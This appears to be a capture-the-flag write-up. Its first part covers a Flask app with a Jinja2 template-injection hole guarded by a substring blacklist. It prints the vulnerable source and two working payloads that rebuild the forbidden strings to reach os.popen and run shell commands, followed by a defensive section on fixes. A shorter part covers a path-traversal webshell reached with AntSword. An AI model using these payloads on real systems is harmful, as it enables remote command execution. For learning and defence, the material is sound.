Safe_Proxy

The source code is handed out at the start; it doesn't look like it can be attacked directly.

Pull it down locally and go straight at it.

from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)

@app.route('/', methods=["GET"])
def source():
    # GET: serve this file's own source, HTML-escaped
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>'+html.escape(f.read())+'</pre>'

@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # "security filter": a plain substring blacklist over the submitted template
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    # the user's input is rendered as a Jinja2 template (the SSTI sink)
    result = render_template_string(template_code)
    print(result)
    return result

if __name__ == "__main__":
    app.run(host='127.0.0.1',port=5000)

Hit it with the payload directly:

code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `ls /` > app.py').read()}}

code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `cat /flag` > app.py').read()}}
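The challenge source above passes the POST body straight into render_template_string, so the only thing standing between the user and Jinja2 is a substring blacklist, and the payload builds the forbidden strings at run time instead of writing them literally. The following is an added, defender-side example, not code from the writeup or from the challenge: it reproduces the same blacklist check, shows the vulnerable pattern next to the two usual fixes (render user input as data, or, if untrusted templates are genuinely required, render them in jinja2's SandboxedEnvironment), and checks that a concatenation-style probe sails through the blacklist but is stopped by the sandbox. It assumes jinja2 is installed (it ships with Flask); the function names and the probe strings are this example's own.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Same substring blacklist as the challenge source (copied for illustration).
BLACKLIST = ['__', 'import', 'os', 'sys', 'eval', 'subprocess',
             'popen', 'system', '\r', '\n']

# Constructed probe: builds "__class__" at run time, so no blacklisted
# substring appears literally. Harmless on its own; it only shows that the
# filter inspects text while Jinja2 evaluates expressions.
CONCAT_PROBE = "{% set g = '_'*2 + 'class' + '_'*2 %}{{ ''[g]() }}"


def passes_blacklist(code: str) -> bool:
    """True if none of the forbidden substrings occur literally in `code`."""
    return not any(black in code for black in BLACKLIST)


def render_vulnerable(user_code: str) -> str:
    """Vulnerable pattern: the user's string *is* the template, so any
    {{ ... }} it contains is evaluated. Mirrors render_template_string(code)."""
    env = Environment(autoescape=True)
    return env.from_string(user_code).render()


def render_as_data(user_code: str) -> str:
    """Fix 1: keep the template fixed and pass the user's string as data.
    Jinja2 then prints it (HTML-escaped) instead of parsing it."""
    env = Environment(autoescape=True)
    return env.from_string("{{ code }}").render(code=user_code)


def render_sandboxed(user_code: str) -> str:
    """Fix 2: render the untrusted template inside SandboxedEnvironment, which
    refuses attribute access to names starting with an underscore, so the
    __globals__/__builtins__ traversal fails with SecurityError."""
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string(user_code).render()


def sandbox_blocks(user_code: str) -> bool:
    """True if the sandbox rejects the template with SecurityError."""
    try:
        render_sandboxed(user_code)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    harmless = "{{ 7*7 }}"                 # constructed sample input
    print(passes_blacklist(harmless))       # True: nothing for the filter to see
    print(render_vulnerable(harmless))      # 49: the expression was evaluated
    print(render_as_data(harmless))         # {{ 7*7 }}: printed verbatim as data
    print(render_sandboxed(harmless))       # 49: ordinary templating still works
    print(passes_blacklist(CONCAT_PROBE))   # True: the blacklist is bypassed
    print(sandbox_blocks(CONCAT_PROBE))     # True: the sandbox stops it at run time
```

The first fix is the one to reach for: if the application only needs to echo a user-supplied value, it should never be parsed as a template at all. The sandbox is a fallback for products that must let users write templates, and even then it is only as good as its attribute policy, so it should be paired with a minimal template namespace rather than relied on alone.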

hello web

Looking through the comments, I found this hint.

After visiting it, I found that you need a ….// bypass.

Like so:

[image: image-20241215191139648]

It's a webshell!

[image: image-20241215202829273]

Connect with AntSword (蚁剑); the flag is in one of the folders under /run/log/.

sxweb1 really should have been solvable by all rights, but it kept throwing 500… 5555555… still a noob.